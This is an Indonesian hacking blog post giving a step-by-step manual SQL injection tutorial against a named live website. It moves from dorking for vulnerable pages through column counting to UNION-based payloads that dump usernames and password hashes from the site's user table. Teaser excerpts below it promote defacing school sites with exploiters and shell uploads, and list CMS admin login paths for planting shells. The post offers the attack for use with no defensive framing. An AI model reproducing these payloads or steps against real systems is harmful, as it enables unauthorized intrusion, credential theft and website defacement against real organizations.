Langsung ke konten utama

SQL Injection Manual Mudah

Hallo sorry ya kalau postingnya agak malem, soalnya banyak kesibukan :) maklum lah masih pelajar bukan sok sibuk lho ya :3 

Pertama saya berterimakasih kepada bang cendrawasih dan bang pegasus karena telah memberikan ilmunya :)

Langsung saja kali ini saya akan memberikan materi SQL Injection Manual Mudah.

Pertama download dulu add ons Hackbar mozilla firefox nya di sini 

Hackbar yang ini sudah dimodifikasi agar penggunannya lebih mudah dan simpel 

setelah hackbar didownload langsung saja dorking dengan dork anda.
Jika tidak tau cara membuat dork bisa ke sini
disitu dijelaskan cara membuat dan mengembangkan dork

setelah dorking dan dapat site yang vuln sqli ikuti step demi step berikut
buka web nya disini saya memakai live target http://www.pdpersi.co.id/content/pd_events.php?catid=14


Langsung saja tambahkan ( ' ) dibelakang url tanpa tanda kurung, jadinya http://www.pdpersi.co.id/content/pd_events.php?catid=14'


Klo vuln akan seperti ini ada tulisan You have an error in your SQL syntax blablabla ...
lanjut ke step berikutnya, buka hackbar nya deengan cara menekan tombol F9

Kemudian kita tambahkan exploitnya yaitu ( +order+by+1--+ ) dibelakang url tanpa tanda kurung di hackbarnya kemudian klik execute
jadinya http://www.pdpersi.co.id/content/pd_events.php?catid=14+order+by+1--+ 

Nah disini belum keliatan errornya 

kita langsung aja cari menu union based >> column count >> order by 

Lalu langsung saja kita ubah angka +1 dengan yang kita iniginkan, coba2 terus sampai muncul error seperti ini

nah kan muncul tuh error nya di angka 6, berarti databases nya dia cuman sampai 5 aja, langsung aja kita buka seperti ini di hackbar nya

Kemudian klik dan ketikkan 5 dan tekan ENTER 
Maka akan jadi seperti ini, muncul angka keramat yaitu 2 dan 5 :v 

Kita coba exploit angka 2 nya , pertama kita hapus angka 2 lalu kita exploit, lihat ss

pilih union based >> dios mysql >> dios By Madblood kemudian execute
maka jadinya akan seperti ini cari tulisan username

Disitu terlihat bahwa username dan password ada di tabel cms_user
dan link nya adalah http://www.pdpersi.co.id/content/pd_events.php
?catid=14+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),3,4,5--+

Langsung saja ubah di hackbar menjadi seperti ini 
information_schema.columns ubah menjadi cms_user
table_name ubah jadi username
column_name ubah jadi password 

maka akan seperti ini jadinya http://www.pdpersi.co.id/content/pd_events.php
?catid=14+UNION+ALL+SELECT+1,(Select+export_set(5,@:=0,(select+count(*)from(cms_user)where@:=export_set(5,export_set(5,@,username,0x3c6c693e,2),password,0xa3a,2)),@,2)),3,4,5--+
lalu execute dan jadinya akan seperti ini :)

Taraa username dan password nya udah ketemu :)
password nya tinggal hash , untuk hash password bisa di sini

gimana ? gampang kan ? gaada yang susah klo ada niat buat belajar :)
sekian tolong share ya biar teman2 kalian bisa juga :)








Label:

Komentar

Posting Komentar

Postingan populer dari blog ini

Deface Website CMS Balitbang [ With New Exploiter ]

Pertama anngap saja kalean udah dorking dan undah dapet target baliitbang Klo belum bisa dorking bisa ke  Sini Dan untuk dork balitbang bisa ke  Sini Disini kita dah nemu target yaitu http:// www.telenikapalembang.sch.id Copy link nya dan buka exploiter nya di bawah ini ( Silahkan gunakan salah satu exploiter dibawah ini, jika salah satu error, bisa gunakan yang lain ) Exploiter 1   Exploiter  2 Kalau link rusak lapor di komen Masukkan link nya sehingga jadi kek gini lihat gambar ini cara caranya , klik sesuai instruksi gambar dan yang terakhir klik lewat sini brade Klik lewat sini brade Ikuti Instruksi gambar dibawah ini  Rename shell anda dulu jadi tgs-ganteng.php5 atau tgs-ganteng.phtml lalu klik simpan dan jika berhasil maka akan seperti ini jadinya ( Keluar nama sekolahnya ) Lalu jika udah berhasil langsung aja klik salah satu link yang dikasih tuh ( nomer 4 ) , klik nya berdasarkan nama shel...
20 komentar
Baca selengkapnya

Apa ? Blogspot Tim Error Violence Kena Deface ?

Baru baru ini muncul tim baru bernama Error Violence Saya sih antara percaya dan gak percaya ini blogspot kena deface Di link  http://error-violence.blogspot.co.id  bertuliskan Touched By ./CalmCoder ( Itu teman saya ) Kemarin saya dapat kabar dari temen saya klo dia bisa deface blogspot, pas saya tanya " masa sih ? blogspot mana bisa dideface -_-" Dia jawab " Ini buktinya bisa :v ada trik nya dong :*" Saya juga belum tau ini ASLI atau HOAX Untuk link langsung aja klik  http://error-violence.blogspot.co.id Jika ada pertanyaan seputar deface, berita, atau lainnya silahkan ke  https://www.facebook.com/moderncoding.id
7 komentar
Baca selengkapnya

List CMS Admin Login

Baiklah malam ini saya akan share tentang  List CMS Admin Login  Tidak sedikit orang yang ketika sudah mendapatkan username dan password sebuah website namun mereka bingung waktu mencari tempat login adminnya untuk mengupload shell andalan mereka  Oleh karena itu malam ini saya akan share List CMS Admin Login  langsung saja yaa simak tulisan yang saya tulis dibawah ini  JOOMLA = administrator Wordpress = wp-login.php Lokomedia = admin, adminweb, administrator, redaktur Opencart = admin Zencart = admin Drupal = ?q=user Magento = admin Cara aksesnya yaitu jika misalkan site nya joomla maka kita akses seperti ini  site.com/administrator Jika wordpress  site.com/wp-login.php Jika lokomedia  site.com/admin  site.com/adminweb  site.com/adminisrator site.com/redaktur Jika Opencart site.com/admin Jika Zencart site.com/admin Jika Drupal sitee.com/?q=user Jika Magento site.com/admi...
Posting Komentar
Baca selengkapnya